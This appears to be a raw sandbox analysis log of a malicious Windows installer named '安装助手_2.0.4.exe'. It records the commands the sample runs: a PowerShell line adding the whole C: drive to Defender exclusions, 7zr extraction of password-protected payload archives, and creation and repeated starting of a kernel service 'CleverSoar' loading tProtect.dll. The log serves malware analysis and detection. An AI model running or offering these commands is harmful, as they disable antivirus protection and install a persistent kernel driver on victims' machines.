Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.4.exeProcess created: C:\Users\user\AppData\Local\Temp\is-940M1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp "C:\Users\user\AppData\Local\Temp\is-940M1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp" /SL5="$2044E,4753025,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.4.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-940M1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-940M1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpProcess created: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.4.exe "C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.4.exe" /VERYSILENTJump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.4.exeProcess created: C:\Users\user\AppData\Local\Temp\is-FCSH1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp "C:\Users\user\AppData\Local\Temp\is-FCSH1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp" /SL5="$6047A,4753025,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.4.exe" /VERYSILENTJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-FCSH1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpProcess created: C:\Program Files (x86)\Windows NT\7zr.exe 7zr.exe x -y res.dat -pad8dtyw9eyfd9aslyd9ialdJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-FCSH1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpProcess created: C:\Program Files (x86)\Windows NT\7zr.exe 7zr.exe x -y locale3.dat -pasfasdf79yf9layslofsJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-FCSH1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= autoJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoarJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.4.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.4.exe | Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\is-940M1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp | Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\is-940M1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp | Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\is-940M1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp | Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\is-940M1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp | Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\is-940M1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\is-940M1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp | Section loaded: wtsapi32.dll
Source: C:\Users\user\AppData\Local\Temp\is-940M1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp | Section loaded: winsta.dll
Source: C:\Users\user\AppData\Local\Temp\is-940M1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp | Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\is-940M1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp | Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\is-940M1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp | Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\is-940M1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp | Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\is-940M1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp | Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\is-940M1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp | Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-940M1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp | Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-940M1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp | Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-940M1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp | Section loaded: shfolder.dll
Source: C:\Users\user\AppData\Local\Temp\is-940M1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp | Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\is-940M1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp | Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\is-940M1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp | Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\is-940M1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp | Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\is-940M1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp | Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\is-940M1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp | Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\is-940M1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp | Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\is-940M1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp | Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\is-940M1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp | Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\is-940M1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp | Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\is-940M1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp | Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\is-940M1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp | Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\is-940M1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp | Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\is-940M1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp | Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\is-940M1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp | Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\is-940M1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp | Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\is-940M1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp | Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\is-940M1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp | Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\is-940M1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp | Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\is-940M1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.4.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.4.exe | Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\is-FCSH1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp | Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\is-FCSH1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp | Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\is-FCSH1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp | Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\is-FCSH1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp | Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\is-FCSH1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\is-FCSH1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp | Section loaded: wtsapi32.dll
Source: C:\Users\user\AppData\Local\Temp\is-FCSH1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp | Section loaded: winsta.dll
Source: C:\Users\user\AppData\Local\Temp\is-FCSH1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp | Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\is-FCSH1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp | Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\is-FCSH1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp | Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\is-FCSH1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp | Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\is-FCSH1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp | Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\is-FCSH1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp | Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-FCSH1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp | Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-FCSH1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp | Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-FCSH1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp | Section loaded: shfolder.dll
Source: C:\Users\user\AppData\Local\Temp\is-FCSH1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp | Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\is-FCSH1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp | Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\is-FCSH1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp | Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\is-FCSH1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp | Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\is-FCSH1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp | Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\is-FCSH1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp | Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\is-FCSH1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp | Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\is-FCSH1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp | Section loaded: dwmapi.dll
Source: C:\Users\user\AppData\Local\Temp\is-FCSH1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp | Section loaded: sfc.dll
Source: C:\Users\user\AppData\Local\Temp\is-FCSH1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp | Section loaded: sfc_os.dll
Source: C:\Users\user\AppData\Local\Temp\is-FCSH1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp | Section loaded: explorerframe.dll
Source: C:\Users\user\AppData\Local\Temp\is-FCSH1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp | Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\is-FCSH1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp | Section loaded: apphelp.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: fastprox.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: ncobjapi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: mpclient.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: version.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: wmitomi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: mi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\is-940M1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
Source: C:\Users\user\AppData\Local\Temp\is-940M1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp | Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwner
Source: C:\Users\user\AppData\Local\Temp\is-FCSH1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp | Window found: window name: TMainForm
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: #U5b89#U88c5#U52a9#U624b_2.0.4.exe | Static file information: File size 5707417 > 1048576
Source: #U5b89#U88c5#U52a9#U624b_2.0.4.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: c:\builddir\threat~1.26\drivers\tfsysmon\objfre_wnet_amd64\amd64\TfSysMon.pdb source: 7zr.exe, 0000000B.00000003.1738474598.0000000003440000.00000004.00001000.00020000.00000000.sdmp, 7zr.exe, 0000000B.00000003.1738614341.0000000003640000.00000004.00001000.00020000.00000000.sdmp, tProtect.dll.11.dr
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_00CF57D0 GetCurrentProcessId,GetCurrentThreadId,LoadLibraryW,GetProcAddress,FreeLibrary,GetTickCount,QueryPerformanceCounter,GetTickCount,9_2_00CF57D0
Source: #U5b89#U88c5#U52a9#U624b_2.0.4.exeStatic PE information: real checksum: 0x0 should be: 0x57517c
Source: update.vac.1.drStatic PE information: real checksum: 0x0 should be: 0x379bd6
Source: update.vac.5.drStatic PE information: real checksum: 0x0 should be: 0x379bd6
Source: #U5b89#U88c5#U52a9#U624b_2.0.4.tmp.0.drStatic PE information: real checksum: 0x0 should be: 0x343a15
Source: #U5b89#U88c5#U52a9#U624b_2.0.4.tmp.4.drStatic PE information: real checksum: 0x0 should be: 0x343a15
Source: tProtect.dll.11.drStatic PE information: real checksum: 0x1eb0f should be: 0xfc66
Source: hrsw.vbc.5.drStatic PE information: real checksum: 0x0 should be: 0x379bd6
Source: #U5b89#U88c5#U52a9#U624b_2.0.4.exeStatic PE information: section name: .didata
Source: #U5b89#U88c5#U52a9#U624b_2.0.4.tmp.0.drStatic PE information: section name: .didata
Source: update.vac.1.drStatic PE information: section name: .00cfg
Source: update.vac.1.drStatic PE information: section name: .voltbl
Source: update.vac.1.drStatic PE information: section name: .=~
Source: #U5b89#U88c5#U52a9#U624b_2.0.4.tmp.4.drStatic PE information: section name: .didata
Source: 7zr.exe.5.drStatic PE information: section name: .sxdata
Source: is-9PU3N.tmp.5.drStatic PE information: section name: .xdata
Source: hrsw.vbc.5.drStatic PE information: section name: .00cfg
Source: hrsw.vbc.5.drStatic PE information: section name: .voltbl
Source: hrsw.vbc.5.drStatic PE information: section name: .=~
Source: update.vac.5.drStatic PE information: section name: .00cfg
Source: update.vac.5.drStatic PE information: section name: .voltbl
Source: update.vac.5.drStatic PE information: section name: .=~
Source: C:\Users\user\AppData\Local\Temp\is-FCSH1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpCode function: 5_2_6C7B86EB push ecx; ret 5_2_6C7B86FE
Source: C:\Users\user\AppData\Local\Temp\is-FCSH1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpCode function: 5_2_6C660F00 push ss; retn 0001h5_2_6C660F0A
Source: C:\Users\user\AppData\Local\Temp\is-FCSH1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpCode function: 5_2_6C886F10 push eax; ret 5_2_6C886F2E
Source: C:\Users\user\AppData\Local\Temp\is-FCSH1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpCode function: 5_2_6C7EB9F4 push 004AC35Ch; ret 5_2_6C7EBA0E
Source: C:\Users\user\AppData\Local\Temp\is-FCSH1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpCode function: 5_2_6C887290 push eax; ret 5_2_6C8872BE
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_00C745F4 push 00D1C35Ch; ret 9_2_00C7460E
Source: C:\Program Files (x86)\Windows NT\7zr.exe	Code function: 9_2_00D0FB10 push eax; ret	9_2_00D0FB2E
Source: C:\Program Files (x86)\Windows NT\7zr.exe	Code function: 9_2_00D0FE90 push eax; ret	9_2_00D0FEBE
Source: update.vac.1.dr	Static PE information: section name: .=~ entropy: 7.19316283520878
Source: hrsw.vbc.5.dr	Static PE information: section name: .=~ entropy: 7.19316283520878
Source: update.vac.5.dr	Static PE information: section name: .=~ entropy: 7.19316283520878
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.4.exe	File created: C:\Users\user\AppData\Local\Temp\is-FCSH1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp
Source: C:\Users\user\AppData\Local\Temp\is-FCSH1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp	File created: C:\Program Files (x86)\Windows NT\hrsw.vbc
Source: C:\Users\user\AppData\Local\Temp\is-FCSH1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp	File created: C:\Program Files (x86)\Windows NT\trash (copy)
Source: C:\Users\user\AppData\Local\Temp\is-FCSH1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp	File created: C:\Program Files (x86)\Windows NT\is-9PU3N.tmp
Source: C:\Users\user\AppData\Local\Temp\is-FCSH1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp	File created: C:\Users\user\AppData\Local\Temp\is-361I0.tmp\update.vac
Source: C:\Users\user\AppData\Local\Temp\is-940M1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp	File created: C:\Users\user\AppData\Local\Temp\is-2LMM8.tmp\_isetup\_setup64.tmp
